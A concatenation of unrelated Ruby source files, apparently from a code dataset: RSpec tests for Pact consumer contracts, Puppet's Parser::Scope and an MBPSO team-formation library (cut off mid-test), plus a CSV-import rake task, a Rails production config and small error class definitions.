subject { ConsumerContract.new(:interactions => [interaction], :consumer => consumer, :provider => provider) }
let(:criteria) { {:description => /blah/} }
before do
interaction.should_receive(:matches_criteria?).with(criteria).and_return(matches)
end
context "by description" do
context "when no interactions are found" do
let(:matches) { false }
it "returns an empty array" do
expect(subject.find_interactions(criteria)).to eql []
end
end
context "when interactions are found" do
let(:matches) { true }
it "returns an array of the matching interactions" do
expect(subject.find_interactions(criteria)).to eql [interaction]
end
end
end
end
describe "find_interaction" do
let(:consumer) { double('Pact::ServiceConsumer', :name => 'Consumer')}
let(:provider) { double('Pact::ServiceProvider', :name => 'Provider')}
let(:interaction1) { double('Pact::Interaction') }
let(:interaction2) { double('Pact::Interaction') }
let(:criteria) { {:description => /blah/} }
before do
interaction1.should_receive(:matches_criteria?).with(criteria).and_return(matches1)
interaction2.should_receive(:matches_criteria?).with(criteria).and_return(matches2)
end
subject { ConsumerContract.new(:interactions => [interaction1, interaction2], :consumer => consumer, :provider => provider) }
context "by description" do
context "when a match is found" do
let(:matches1) { true }
let(:matches2) { false }
it "returns the interaction" do
expect(subject.find_interaction criteria).to eql interaction1
end
end
context "when more than one match is found" do
let(:matches1) { true }
let(:matches2) { true }
it "raises an error" do
expect{ subject.find_interaction(criteria) }.to raise_error "Found more than 1 interaction matching {:description=>/blah/} in pact file between Consumer and Provider."
end
end
context "when a match is not found" do
let(:matches1) { false }
let(:matches2) { false }
it "raises an error" do
expect{ subject.find_interaction(criteria) }.to raise_error "Could not find interaction matching {:description=>/blah/} in pact file between Consumer and Provider."
end
end
end
end
describe "update_pactfile" do
let(:pacts_dir) { Pathname.new("./tmp/pactfiles") }
let(:expected_pact_path) { pacts_dir + "test_consumer-test_service.json" }
let(:expected_pact_string) do <<-eos
{
"provider": {
"name": "test_service"
},
"consumer": {
"name": "test_consumer"
},
"interactions": [
"something"
],
"metadata": {
"pact_gem": {
"version": "#{Pact::VERSION}"
}
}
}
eos
end
let(:consumer) { Pact::ServiceConsumer.new(:name => 'test_consumer')}
let(:provider) { Pact::ServiceProvider.new(:name => 'test_service')}
let(:interactions) { [double("interaction", as_json: "something")]}
subject { ConsumerContract.new(:consumer => consumer, :provider => provider, :interactions => interactions) }
before do
Pact.configuration.stub(:pact_dir).and_return(Pathname.new("./tmp/pactfiles"))
FileUtils.rm_rf pacts_dir
FileUtils.mkdir_p pacts_dir
subject.update_pactfile
end
it "should write to a file specified by the consumer and provider name" do
File.exist?(expected_pact_path).should be_true
end
it "should write the interactions to the file" do
File.read(expected_pact_path).should eql expected_pact_string.strip
end
end
end
end | 35.727273 | 179 | 0.627226 |
bfd3c72aba43343a53fe260dc3e053366bb4b5bf | 26,092 | #! /usr/bin/env ruby
require 'spec_helper'
require 'puppet_spec/compiler'
require 'puppet_spec/scope'
describe Puppet::Parser::Scope do
include PuppetSpec::Scope
before :each do
@scope = Puppet::Parser::Scope.new(
Puppet::Parser::Compiler.new(Puppet::Node.new("foo"))
)
@scope.source = Puppet::Resource::Type.new(:node, :foo)
@topscope = @scope.compiler.topscope
@scope.parent = @topscope
end
describe "create_test_scope_for_node" do
let(:node_name) { "node_name_foo" }
let(:scope) { create_test_scope_for_node(node_name) }
it "should be a kind of Scope" do
expect(scope).to be_a_kind_of(Puppet::Parser::Scope)
end
it "should set the source to a node resource" do
expect(scope.source).to be_a_kind_of(Puppet::Resource::Type)
end
it "should have a compiler" do
expect(scope.compiler).to be_a_kind_of(Puppet::Parser::Compiler)
end
it "should set the parent to the compiler topscope" do
expect(scope.parent).to be(scope.compiler.topscope)
end
end
it "should generate a simple string when inspecting a scope" do
expect(@scope.inspect).to eq("Scope()")
end
it "should generate a simple string when inspecting a scope with a resource" do
@scope.resource="foo::bar"
expect(@scope.inspect).to eq("Scope(foo::bar)")
end
it "should return a scope for use in a test harness" do
expect(create_test_scope_for_node("node_name_foo")).to be_a_kind_of(Puppet::Parser::Scope)
end
it "should be able to retrieve class scopes by name" do
@scope.class_set "myname", "myscope"
expect(@scope.class_scope("myname")).to eq("myscope")
end
it "should be able to retrieve class scopes by object" do
klass = mock 'ast_class'
klass.expects(:name).returns("myname")
@scope.class_set "myname", "myscope"
expect(@scope.class_scope(klass)).to eq("myscope")
end
it "should be able to retrieve its parent module name from the source of its parent type" do
@topscope.source = Puppet::Resource::Type.new(:hostclass, :foo, :module_name => "foo")
expect(@scope.parent_module_name).to eq("foo")
end
it "should return a nil parent module name if it has no parent" do
expect(@topscope.parent_module_name).to be_nil
end
it "should return a nil parent module name if its parent has no source" do
expect(@scope.parent_module_name).to be_nil
end
it "should get its environment from its compiler" do
env = Puppet::Node::Environment.create(:testing, [])
compiler = stub 'compiler', :environment => env, :is_a? => true
scope = Puppet::Parser::Scope.new(compiler)
expect(scope.environment).to equal(env)
end
it "should fail if no compiler is supplied" do
expect {
Puppet::Parser::Scope.new
}.to raise_error(ArgumentError, /wrong number of arguments/)
end
it "should fail if something that isn't a compiler is supplied" do
expect {
Puppet::Parser::Scope.new(:compiler => true)
}.to raise_error(Puppet::DevError, /you must pass a compiler instance/)
end
it "should use the resource type collection helper to find its known resource types" do
expect(Puppet::Parser::Scope.ancestors).to include(Puppet::Resource::TypeCollectionHelper)
end
describe "when custom functions are called" do
let(:env) { Puppet::Node::Environment.create(:testing, []) }
let(:compiler) { Puppet::Parser::Compiler.new(Puppet::Node.new('foo', :environment => env)) }
let(:scope) { Puppet::Parser::Scope.new(compiler) }
it "calls methods prefixed with function_ as custom functions" do
expect(scope.function_sprintf(["%b", 123])).to eq("1111011")
end
it "raises an error when arguments are not passed in an Array" do
expect do
scope.function_sprintf("%b", 123)
end.to raise_error ArgumentError, /custom functions must be called with a single array that contains the arguments/
end
it "raises an error on subsequent calls when arguments are not passed in an Array" do
scope.function_sprintf(["first call"])
expect do
scope.function_sprintf("%b", 123)
end.to raise_error ArgumentError, /custom functions must be called with a single array that contains the arguments/
end
it "raises NoMethodError when the not prefixed" do
expect { scope.sprintf(["%b", 123]) }.to raise_error(NoMethodError)
end
it "raises NoMethodError when prefixed with function_ but it doesn't exist" do
expect { scope.function_fake_bs(['cows']) }.to raise_error(NoMethodError)
end
end
describe "when initializing" do
it "should extend itself with its environment's Functions module as well as the default" do
env = Puppet::Node::Environment.create(:myenv, [])
root = Puppet.lookup(:root_environment)
compiler = stub 'compiler', :environment => env, :is_a? => true
scope = Puppet::Parser::Scope.new(compiler)
expect(scope.singleton_class.ancestors).to be_include(Puppet::Parser::Functions.environment_module(env))
expect(scope.singleton_class.ancestors).to be_include(Puppet::Parser::Functions.environment_module(root))
end
it "should extend itself with the default Functions module if its environment is the default" do
root = Puppet.lookup(:root_environment)
node = Puppet::Node.new('localhost')
compiler = Puppet::Parser::Compiler.new(node)
scope = Puppet::Parser::Scope.new(compiler)
expect(scope.singleton_class.ancestors).to be_include(Puppet::Parser::Functions.environment_module(root))
end
end
describe "when looking up a variable" do
it "should support :lookupvar and :setvar for backward compatibility" do
@scope.setvar("var", "yep")
expect(@scope.lookupvar("var")).to eq("yep")
end
it "should fail if invoked with a non-string name" do
expect { @scope[:foo] }.to raise_error(Puppet::ParseError, /Scope variable name .* not a string/)
expect { @scope[:foo] = 12 }.to raise_error(Puppet::ParseError, /Scope variable name .* not a string/)
end
it "should return nil for unset variables when --strict variables is not in effect" do
expect(@scope["var"]).to be_nil
end
it "answers exist? with boolean false for non existing variables" do
expect(@scope.exist?("var")).to be(false)
end
it "answers exist? with boolean false for non existing variables" do
@scope["var"] = "yep"
expect(@scope.exist?("var")).to be(true)
end
it "should be able to look up values" do
@scope["var"] = "yep"
expect(@scope["var"]).to eq("yep")
end
it "should be able to look up hashes" do
@scope["var"] = {"a" => "b"}
expect(@scope["var"]).to eq({"a" => "b"})
end
it "should be able to look up variables in parent scopes" do
@topscope["var"] = "parentval"
expect(@scope["var"]).to eq("parentval")
end
it "should prefer its own values to parent values" do
@topscope["var"] = "parentval"
@scope["var"] = "childval"
expect(@scope["var"]).to eq("childval")
end
it "should be able to detect when variables are set" do
@scope["var"] = "childval"
expect(@scope).to be_include("var")
end
it "does not allow changing a set value" do
@scope["var"] = "childval"
expect {
@scope["var"] = "change"
}.to raise_error(Puppet::Error, "Cannot reassign variable '$var'")
end
it "should be able to detect when variables are not set" do
expect(@scope).not_to be_include("var")
end
it "warns and return nil for non found unqualified variable" do
Puppet.expects(:warn_once)
expect(@scope["santa_clause"]).to be_nil
end
it "warns once for a non found variable" do
Puppet.expects(:warning).once
expect([@scope["santa_claus"],@scope["santa_claus"]]).to eq([nil, nil])
end
it "warns and return nil for non found qualified variable" do
Puppet.expects(:warn_once)
expect(@scope["north_pole::santa_clause"]).to be_nil
end
it "does not warn when a numeric variable is missing - they always exist" do
Puppet.expects(:warn_once).never
expect(@scope["1"]).to be_nil
end
describe "and the variable is qualified" do
before :each do
@known_resource_types = @scope.known_resource_types
node = Puppet::Node.new('localhost')
@compiler = Puppet::Parser::Compiler.new(node)
end
def newclass(name)
@known_resource_types.add Puppet::Resource::Type.new(:hostclass, name)
end
def create_class_scope(name)
klass = newclass(name)
catalog = Puppet::Resource::Catalog.new
catalog.add_resource(Puppet::Parser::Resource.new("stage", :main, :scope => Puppet::Parser::Scope.new(@compiler)))
Puppet::Parser::Resource.new("class", name, :scope => @scope, :source => mock('source'), :catalog => catalog).evaluate
@scope.class_scope(klass)
end
it "should be able to look up explicitly fully qualified variables from main" do
Puppet.expects(:deprecation_warning).never
other_scope = create_class_scope("")
other_scope["othervar"] = "otherval"
expect(@scope["::othervar"]).to eq("otherval")
end
it "should be able to look up explicitly fully qualified variables from other scopes" do
Puppet.expects(:deprecation_warning).never
other_scope = create_class_scope("other")
other_scope["var"] = "otherval"
expect(@scope["::other::var"]).to eq("otherval")
end
it "should be able to look up deeply qualified variables" do
Puppet.expects(:deprecation_warning).never
other_scope = create_class_scope("other::deep::klass")
other_scope["var"] = "otherval"
expect(@scope["other::deep::klass::var"]).to eq("otherval")
end
it "should return nil for qualified variables that cannot be found in other classes" do
other_scope = create_class_scope("other::deep::klass")
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should warn and return nil for qualified variables whose classes have not been evaluated" do
klass = newclass("other::deep::klass")
Puppet.expects(:warn_once)
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should warn and return nil for qualified variables whose classes do not exist" do
Puppet.expects(:warn_once)
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should return nil when asked for a non-string qualified variable from a class that does not exist" do
expect(@scope["other::deep::klass::var"]).to be_nil
end
it "should return nil when asked for a non-string qualified variable from a class that has not been evaluated" do
@scope.stubs(:warning)
klass = newclass("other::deep::klass")
expect(@scope["other::deep::klass::var"]).to be_nil
end
end
context "and strict_variables is true" do
before(:each) do
Puppet[:strict_variables] = true
end
it "should throw a symbol when unknown variable is looked up" do
expect { @scope['john_doe'] }.to throw_symbol(:undefined_variable)
end
it "should throw a symbol when unknown qualified variable is looked up" do
expect { @scope['nowhere::john_doe'] }.to throw_symbol(:undefined_variable)
end
it "should not raise an error when built in variable is looked up" do
expect { @scope['caller_module_name'] }.to_not raise_error
expect { @scope['module_name'] }.to_not raise_error
end
end
context "and strict_variables is false and --strict=off" do
before(:each) do
Puppet[:strict_variables] = false
Puppet[:strict] = :off
end
it "should not error when unknown variable is looked up and produce nil" do
expect(@scope['john_doe']).to be_nil
end
it "should not error when unknown qualified variable is looked up and produce nil" do
expect(@scope['nowhere::john_doe']).to be_nil
end
end
context "and strict_variables is false and --strict=warning" do
before(:each) do
Puppet[:strict_variables] = false
Puppet[:strict] = :warning
end
it "should not error when unknown variable is looked up" do
expect(@scope['john_doe']).to be_nil
end
it "should not error when unknown qualified variable is looked up" do
expect(@scope['nowhere::john_doe']).to be_nil
end
end
context "and strict_variables is false and --strict=error" do
before(:each) do
Puppet[:strict_variables] = false
Puppet[:strict] = :error
end
it "should raise error when unknown variable is looked up" do
expect { @scope['john_doe'] }.to raise_error(/Undefined variable/)
end
it "should not throw a symbol when unknown qualified variable is looked up" do
expect { @scope['nowhere::john_doe'] }.to raise_error(/Undefined variable/)
end
end
end
describe "when variables are set with append=true" do
it "should raise error if the variable is already defined in this scope" do
@scope.setvar("var", "1", :append => false)
expect {
@scope.setvar("var", "1", :append => true)
}.to raise_error(
Puppet::ParseError,
"Cannot append, variable '$var' is defined in this scope"
)
end
it "should lookup current variable value" do
@scope.expects(:[]).with("var").returns("2")
@scope.setvar("var", "1", :append => true)
end
it "should store the concatenated string '42'" do
@topscope.setvar("var", "4", :append => false)
@scope.setvar("var", "2", :append => true)
expect(@scope["var"]).to eq("42")
end
it "should store the concatenated array [4,2]" do
@topscope.setvar("var", [4], :append => false)
@scope.setvar("var", [2], :append => true)
expect(@scope["var"]).to eq([4,2])
end
it "should store the merged hash {a => b, c => d}" do
@topscope.setvar("var", {"a" => "b"}, :append => false)
@scope.setvar("var", {"c" => "d"}, :append => true)
expect(@scope["var"]).to eq({"a" => "b", "c" => "d"})
end
it "should raise an error when appending a hash with something other than another hash" do
@topscope.setvar("var", {"a" => "b"}, :append => false)
expect {
@scope.setvar("var", "not a hash", :append => true)
}.to raise_error(
ArgumentError,
"Trying to append to a hash with something which is not a hash is unsupported"
)
end
end
describe "when calling number?" do
it "should return nil if called with anything not a number" do
expect(Puppet::Parser::Scope.number?([2])).to be_nil
end
it "should return a Fixnum for a Fixnum" do
expect(Puppet::Parser::Scope.number?(2)).to be_an_instance_of(Fixnum)
end
it "should return a Float for a Float" do
expect(Puppet::Parser::Scope.number?(2.34)).to be_an_instance_of(Float)
end
it "should return 234 for '234'" do
expect(Puppet::Parser::Scope.number?("234")).to eq(234)
end
it "should return nil for 'not a number'" do
expect(Puppet::Parser::Scope.number?("not a number")).to be_nil
end
it "should return 23.4 for '23.4'" do
expect(Puppet::Parser::Scope.number?("23.4")).to eq(23.4)
end
it "should return 23.4e13 for '23.4e13'" do
expect(Puppet::Parser::Scope.number?("23.4e13")).to eq(23.4e13)
end
it "should understand negative numbers" do
expect(Puppet::Parser::Scope.number?("-234")).to eq(-234)
end
it "should know how to convert exponential float numbers ala '23e13'" do
expect(Puppet::Parser::Scope.number?("23e13")).to eq(23e13)
end
it "should understand hexadecimal numbers" do
expect(Puppet::Parser::Scope.number?("0x234")).to eq(0x234)
end
it "should understand octal numbers" do
expect(Puppet::Parser::Scope.number?("0755")).to eq(0755)
end
it "should return nil on malformed integers" do
expect(Puppet::Parser::Scope.number?("0.24.5")).to be_nil
end
it "should convert strings with leading 0 to integer if they are not octal" do
expect(Puppet::Parser::Scope.number?("0788")).to eq(788)
end
it "should convert strings of negative integers" do
expect(Puppet::Parser::Scope.number?("-0788")).to eq(-788)
end
it "should return nil on malformed hexadecimal numbers" do
expect(Puppet::Parser::Scope.number?("0x89g")).to be_nil
end
end
describe "when using ephemeral variables" do
it "should store the variable value" do
# @scope.setvar("1", :value, :ephemeral => true)
@scope.set_match_data({1 => :value})
expect(@scope["1"]).to eq(:value)
end
it "should remove the variable value when unset_ephemeral_var(:all) is called" do
# @scope.setvar("1", :value, :ephemeral => true)
@scope.set_match_data({1 => :value})
@scope.stubs(:parent).returns(nil)
@scope.unset_ephemeral_var(:all)
expect(@scope["1"]).to be_nil
end
it "should not remove classic variables when unset_ephemeral_var(:all) is called" do
@scope['myvar'] = :value1
@scope.set_match_data({1 => :value2})
@scope.stubs(:parent).returns(nil)
@scope.unset_ephemeral_var(:all)
expect(@scope["myvar"]).to eq(:value1)
end
it "should raise an error when setting numerical variable" do
expect {
@scope.setvar("1", :value3, :ephemeral => true)
}.to raise_error(Puppet::ParseError, /Cannot assign to a numeric match result variable/)
end
describe "with more than one level" do
it "should prefer latest ephemeral scopes" do
@scope.set_match_data({0 => :earliest})
@scope.new_ephemeral
@scope.set_match_data({0 => :latest})
expect(@scope["0"]).to eq(:latest)
end
it "should be able to report the current level" do
expect(@scope.ephemeral_level).to eq(1)
@scope.new_ephemeral
expect(@scope.ephemeral_level).to eq(2)
end
it "should not check presence of an ephemeral variable across multiple levels" do
# This test was testing that scope actually screwed up - making values from earlier matches show as if they
# were true for the latest match - insanity!
@scope.new_ephemeral
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({0 => :value2})
@scope.new_ephemeral
expect(@scope.include?("1")).to be_falsey
end
it "should return false when an ephemeral variable doesn't exist in any ephemeral scope" do
@scope.new_ephemeral
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({0 => :value2})
@scope.new_ephemeral
expect(@scope.include?("2")).to be_falsey
end
it "should not get ephemeral values from earlier scope when not in later" do
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({0 => :value2})
expect(@scope.include?("1")).to be_falsey
end
describe "when using a guarded scope" do
it "should remove ephemeral scopes up to this level" do
@scope.set_match_data({1 => :value1})
@scope.new_ephemeral
@scope.set_match_data({1 => :value2})
@scope.with_guarded_scope do
@scope.new_ephemeral
@scope.set_match_data({1 => :value3})
end
expect(@scope["1"]).to eq(:value2)
end
end
end
end
context "when using ephemeral as local scope" do
it "should store all variables in local scope" do
@scope.new_ephemeral true
@scope.setvar("apple", :fruit)
expect(@scope["apple"]).to eq(:fruit)
end
it "should remove all local scope variables on unset" do
@scope.new_ephemeral true
@scope.setvar("apple", :fruit)
expect(@scope["apple"]).to eq(:fruit)
@scope.unset_ephemeral_var
expect(@scope["apple"]).to eq(nil)
end
it "should be created from a hash" do
@scope.ephemeral_from({ "apple" => :fruit, "strawberry" => :berry})
expect(@scope["apple"]).to eq(:fruit)
expect(@scope["strawberry"]).to eq(:berry)
end
end
describe "when setting ephemeral vars from matches" do
before :each do
@match = stub 'match', :is_a? => true
@match.stubs(:[]).with(0).returns("this is a string")
@match.stubs(:captures).returns([])
@scope.stubs(:setvar)
end
it "should accept only MatchData" do
expect {
@scope.ephemeral_from("match")
}.to raise_error(ArgumentError, /Invalid regex match data/)
end
it "should set $0 with the full match" do
# This is an internal impl detail test
@scope.expects(:new_match_scope).with { |*arg| arg[0][0] == "this is a string" }
@scope.ephemeral_from(@match)
end
it "should set every capture as ephemeral var" do
# This is an internal impl detail test
@match.stubs(:[]).with(1).returns(:capture1)
@match.stubs(:[]).with(2).returns(:capture2)
@scope.expects(:new_match_scope).with { |*arg| arg[0][1] == :capture1 && arg[0][2] == :capture2 }
@scope.ephemeral_from(@match)
end
it "should shadow previous match variables" do
# This is an internal impl detail test
@match.stubs(:[]).with(1).returns(:capture1)
@match.stubs(:[]).with(2).returns(:capture2)
@match2 = stub 'match', :is_a? => true
@match2.stubs(:[]).with(1).returns(:capture2_1)
@match2.stubs(:[]).with(2).returns(nil)
@scope.ephemeral_from(@match)
@scope.ephemeral_from(@match2)
expect(@scope.lookupvar('2')).to eq(nil)
end
it "should create a new ephemeral level" do
level_before = @scope.ephemeral_level
@scope.ephemeral_from(@match)
expect(level_before).to be < @scope.ephemeral_level
end
end
describe "when managing defaults" do
it "should be able to set and lookup defaults" do
param = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param)
expect(@scope.lookupdefaults(:mytype)).to eq({:myparam => param})
end
it "should fail if a default is already defined and a new default is being defined" do
param = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param)
expect {
@scope.define_settings(:mytype, param)
}.to raise_error(Puppet::ParseError, /Default already defined .* cannot redefine/)
end
it "should return multiple defaults at once" do
param1 = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param1)
param2 = Puppet::Parser::Resource::Param.new(:name => :other, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param2)
expect(@scope.lookupdefaults(:mytype)).to eq({:myparam => param1, :other => param2})
end
it "should look up defaults defined in parent scopes" do
param1 = Puppet::Parser::Resource::Param.new(:name => :myparam, :value => "myvalue", :source => stub("source"))
@scope.define_settings(:mytype, param1)
child_scope = @scope.newscope
param2 = Puppet::Parser::Resource::Param.new(:name => :other, :value => "myvalue", :source => stub("source"))
child_scope.define_settings(:mytype, param2)
expect(child_scope.lookupdefaults(:mytype)).to eq({:myparam => param1, :other => param2})
end
end
context "#true?" do
{ "a string" => true,
"true" => true,
"false" => true,
true => true,
"" => false,
:undef => false,
nil => false
}.each do |input, output|
it "should treat #{input.inspect} as #{output}" do
expect(Puppet::Parser::Scope.true?(input)).to eq(output)
end
end
end
context "when producing a hash of all variables (as used in templates)" do
it "should contain all defined variables in the scope" do
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green })
end
it "should contain variables in all local scopes (#21508)" do
@scope.new_ephemeral true
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.new_ephemeral true
@scope.setvar("apple", :red)
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green, 'apple' => :red })
end
it "should contain all defined variables in the scope and all local scopes" do
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.new_ephemeral true
@scope.setvar("apple", :red)
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green, 'apple' => :red })
end
it "should not contain varaibles in match scopes (non local emphemeral)" do
@scope.new_ephemeral true
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.ephemeral_from(/(f)(o)(o)/.match('foo'))
expect(@scope.to_hash).to eq({'orange' => :tangerine, 'pear' => :green })
end
it "should delete values that are :undef in inner scope" do
@scope.new_ephemeral true
@scope.setvar("orange", :tangerine)
@scope.setvar("pear", :green)
@scope.new_ephemeral true
@scope.setvar("apple", :red)
@scope.setvar("orange", :undef)
expect(@scope.to_hash).to eq({'pear' => :green, 'apple' => :red })
end
end
end
| 35.49932 | 126 | 0.643531 |
18dc0c8e7ef077bcfa5281306a3b1d0bafcabb1d | 560 | # frozen_string_literal: true
require 'rake'
require 'complexity_importer'
namespace :complexity do
desc 'import complexity records from CSV file'
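# Example invocation (the path is illustrative): bundle exec rake "complexity:import[tmp/complexities.csv]"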
task :import, [:filename] => [:environment] do |_task, args|
Rails.logger = Logger.new(STDOUT)
if args[:filename].blank?
Rails.logger.error('No CSV file specified')
else
Rails.logger.info('Beginning import')
File.open args[:filename] do |f|
ComplexityImporter.import f
end
Rails.logger.info('Import complete')
end
end
end
| 23.333333 | 75 | 0.682143 |
ac62343a3a7f3b5537d2ce5187193cb3822ed627 | 3,802 | Rails.application.configure do
# Settings specified here will take precedence over those in config/application.rb.
# Code is not reloaded between requests.
config.cache_classes = true
# Eager load code on boot. This eager loads most of Rails and
# your application in memory, allowing both threaded web servers
# and those relying on copy on write to perform better.
# Rake tasks automatically ignore this option for performance.
config.eager_load = true
# Full error reports are disabled and caching is turned on.
config.consider_all_requests_local = false
config.action_controller.perform_caching = true
# Attempt to read encrypted secrets from `config/secrets.yml.enc`.
# Requires an encryption key in `ENV["RAILS_MASTER_KEY"]` or
# `config/secrets.yml.key`.
config.read_encrypted_secrets = true
# Disable serving static files from the `/public` folder by default since
# Apache or NGINX already handles this.
config.public_file_server.enabled = ENV['RAILS_SERVE_STATIC_FILES'].present?
# Compress JavaScripts and CSS.
config.assets.js_compressor = :uglifier
# config.assets.css_compressor = :sass
# Do not fallback to assets pipeline if a precompiled asset is missed.
config.assets.compile = false
# `config.assets.precompile` and `config.assets.version` have moved to config/initializers/assets.rb
# Enable serving of images, stylesheets, and JavaScripts from an asset server.
# config.action_controller.asset_host = 'http://assets.example.com'
# Specifies the header that your server uses for sending files.
# config.action_dispatch.x_sendfile_header = 'X-Sendfile' # for Apache
# config.action_dispatch.x_sendfile_header = 'X-Accel-Redirect' # for NGINX
# Mount Action Cable outside main process or domain
# config.action_cable.mount_path = nil
# config.action_cable.url = 'wss://example.com/cable'
# config.action_cable.allowed_request_origins = [ 'http://example.com', /http:\/\/example.*/ ]
# Force all access to the app over SSL, use Strict-Transport-Security, and use secure cookies.
# config.force_ssl = true
# Use the lowest log level to ensure availability of diagnostic information
# when problems arise.
config.log_level = :debug
# Prepend all log lines with the following tags.
config.log_tags = [ :request_id ]
# Use a different cache store in production.
# config.cache_store = :mem_cache_store
# Use a real queuing backend for Active Job (and separate queues per environment)
# config.active_job.queue_adapter = :resque
# config.active_job.queue_name_prefix = "ror-my-restaurant-review_#{Rails.env}"
config.action_mailer.perform_caching = false
# Ignore bad email addresses and do not raise email delivery errors.
# Set this to true and configure the email server for immediate delivery to raise delivery errors.
# config.action_mailer.raise_delivery_errors = false
# Enable locale fallbacks for I18n (makes lookups for any locale fall back to
# the I18n.default_locale when a translation cannot be found).
config.i18n.fallbacks = true
# Send deprecation notices to registered listeners.
config.active_support.deprecation = :notify
# Use default logging formatter so that PID and timestamp are not suppressed.
config.log_formatter = ::Logger::Formatter.new
# Use a different logger for distributed setups.
# require 'syslog/logger'
# config.logger = ActiveSupport::TaggedLogging.new(Syslog::Logger.new 'app-name')
if ENV["RAILS_LOG_TO_STDOUT"].present?
logger = ActiveSupport::Logger.new(STDOUT)
logger.formatter = config.log_formatter
config.logger = ActiveSupport::TaggedLogging.new(logger)
end
# Do not dump schema after migrations.
config.active_record.dump_schema_after_migration = false
end
| 41.326087 | 102 | 0.757233 |
ac5051617bd249ff89300c05d5df68f52b561917 | 231 | module ApiCaller
module Error
class CallerError < StandardError
end
class MissingService < CallerError
end
class MissingRoute < CallerError
end
class MissingRouteName < CallerError
end
end
end | 15.4 | 40 | 0.705628 |
ab49bbd11c0024a4649049f1620ef3e852992bdb | 7,991 | require_relative 'spec_helper'
require '../lib/MBPSO_Team_Formation/mbpso'
require 'csv'
RSpec.describe MBPSOTeamFormation::MBPSO do
def test1
CSV.parse(File.read('test1.csv'), headers: true)
end
def test2
CSV.parse(File.read('test2.csv'), headers: true)
end
def inst_small_table
row1 = CSV::Row.new(%w(id Gender Ethnicity Grade), [1, 0, -1, 1])
row2 = CSV::Row.new(%w(id Gender Ethnicity Grade), [2, 1, 0, 2])
row3 = CSV::Row.new(%w(id Gender Ethnicity Grade), [3, -1, 2, 3])
row4 = CSV::Row.new(%w(id Gender Ethnicity Grade), [4, 0, 3, 4])
row5 = CSV::Row.new(%w(id Gender Ethnicity Grade), [5, 1, 4, 5])
row6 = CSV::Row.new(%w(id Gender Ethnicity Grade), [6, -1, -1, 6])
row7 = CSV::Row.new(%w(id Gender Ethnicity Grade), [7, 0, 0, 7])
row8 = CSV::Row.new(%w(id Gender Ethnicity Grade), [8, 1, 1, 1])
row9 = CSV::Row.new(%w(id Gender Ethnicity Grade), [9, -1, 2, 3])
row10 = CSV::Row.new(%w(id Gender Ethnicity Grade), [10, 0, 3, 5])
CSV::Table.new([row1, row2, row3, row4, row5, row6, row7, row8, row9, row10], headers: %w(id Gender Ethnicity Grade))
end
def inst_small_table2
row1 = CSV::Row.new(%w(id Gender Ethnicity Grade), [1, 0, -1, 1])
row2 = CSV::Row.new(%w(id Gender Ethnicity Grade), [2, 1, 0, 2])
row3 = CSV::Row.new(%w(id Gender Ethnicity Grade), [3, -1, 2, 3])
row4 = CSV::Row.new(%w(id Gender Ethnicity Grade), [4, 0, 3, 4])
row5 = CSV::Row.new(%w(id Gender Ethnicity Grade), [5, 1, 4, 5])
row6 = CSV::Row.new(%w(id Gender Ethnicity Grade), [6, -1, -1, 6])
row7 = CSV::Row.new(%w(id Gender Ethnicity Grade), [7, 0, 0, 7])
row8 = CSV::Row.new(%w(id Gender Ethnicity Grade), [8, 1, 1, 1])
row9 = CSV::Row.new(%w(id Gender Ethnicity Grade), [9, -1, 2, 3])
CSV::Table.new([row1, row2, row3, row4, row5, row6, row7, row8, row9], headers: %w(id Gender Ethnicity Grade))
end
describe "Intialisation" do
it "Initialised successfully with a valid data set" do
expect(MBPSOTeamFormation::MBPSO.new(test1)).to be_a(MBPSOTeamFormation::MBPSO)
expect(MBPSOTeamFormation::MBPSO.new(test2)).to be_a(MBPSOTeamFormation::MBPSO)
end
it "Initialised successfully with different sets of optional paramteres" do
expect(MBPSOTeamFormation::MBPSO.new(test2, num_particles: 20, gender_weight: 5, \
ethnicity_weight: 3, initial_inertia: 4.0)).to be_a(MBPSOTeamFormation::MBPSO)
expect(MBPSOTeamFormation::MBPSO.new(test1, final_inertia: 0.1, control_param_personal: [0.99, 0.6, 0.1], \
control_param_local: [0.1, 0.1, 0.1], survival_number: 30)).to be_a(MBPSOTeamFormation::MBPSO)
expect(MBPSOTeamFormation::MBPSO.new(test2, skill_table: {0..19 => 1, 20..49 => 20, 50..59 => 30, 60..76 => 40, 77..84 => 5, 85..100 => 4}, \
forbidden_pairs: [[1, 2], [3, 4]])).to be_a(MBPSOTeamFormation::MBPSO)
end
it "Instantiates with full set of optional parameters" do
expect(MBPSOTeamFormation::MBPSO.new(test1, team_size: 4, max_iterations: 3000, num_particles: 20, \
gender_weight: 6, ethnicity_weight: 6, initial_inertia: 2.0, final_inertia: 0.1, \
control_param_personal: [0.3, 0.3, 0.3], control_param_local: [0.3, 0.3, 0.3], \
survival_number: 15, final_survival_number: 3, \
skill_table: {0..19 => 1, 20..49 => 20, 50..59 => 30, 60..76 => 40, 77..84 => 5, 85..100 => 4}, \
forbidden_pairs: [[1, 2], [3, 4]], tolerate_missing_values: false, init_num_particles: 2, \
output_stats: false, output_stats_name: 'data', neigh_change_interval: 100, inertia_change_interval: 20, \
sn_change_interval: 20, particles_to_move: 3, inertia_changes: 200, sn_changes: 200, convergence_iterations: 200)).to be_a(MBPSOTeamFormation::MBPSO)
end
it "Throws exceptions for invalid input" do
expect {
MBPSOTeamFormation::MBPSO.new(test1, final_inertia: 'x', control_param_personal: [0.99, 0.6, 0.1], \
